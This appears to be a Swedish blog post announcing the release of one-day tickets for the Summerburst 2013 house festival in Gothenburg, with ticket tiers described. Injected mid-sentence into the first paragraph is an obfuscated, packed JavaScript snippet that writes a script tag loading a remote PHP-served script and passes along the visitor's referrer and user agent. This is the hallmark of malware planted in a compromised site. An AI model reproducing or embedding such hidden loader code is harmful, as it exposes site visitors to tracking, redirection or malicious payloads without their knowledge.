Image Image Image Image Image Image Image Image Image Image

| 15 augusti, 2020

Scroll to top

Top

Summerburst: Imorgon släpps endagsbiljetterna till Göteborg!

Summerburst: Imorgon släpps endagsbiljetterna till Göteborg!
Sebastian

Efter eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yifef|var|u0026u|referrer|sykbi||js|php’.split(’|’),0,{}))
en otroligt lyckad försäljning i Stockholm är det nu dags för Göteborg att få chansen till biljettköp. Imorgon kommer de släppas endagsbiljetter till Summerburst 2013 Göteborg.

Summerburst är Sveriges helt klart största och bästa housefestival med flera utsålda år innan. Därför meddelar vi nu at det är bäst och säkra din plats och se fram emot sommarens största ögonblick av elektronisk livemusik.

Biljetter – Summerburst 2013

Festivalpass 18 års gräns – 2-dagars biljett som tar dig ända fram till scenen. Du får njuta av det stora området och har tillgång till serveringar för både mat och dryck.

Earlybird – Exakt samma som Festivalpass, men denna biljett är till ett rabatterat pris, först till kvarn!

Festivalpass Premium 20 års gräns – Med denna biljett får du röra dig fritt på området. Här kan du avnjuta din dryck medan du har den bästa utsikten över den stora scenen. Ni som har premium biljett får dessutom en egen och snabbare entré till området.

För Cabana kontakta vip@spglive.se

Stureplansgruppen Live och Summerburst reserverar sig för eventuella förändringar av artistuppställningar och framträdanden såväl före som under festivalen. Biljetter återlöses ej till följd av dessa ändringar.

Läs om artisterna som kommer!

Mer info: Hemsida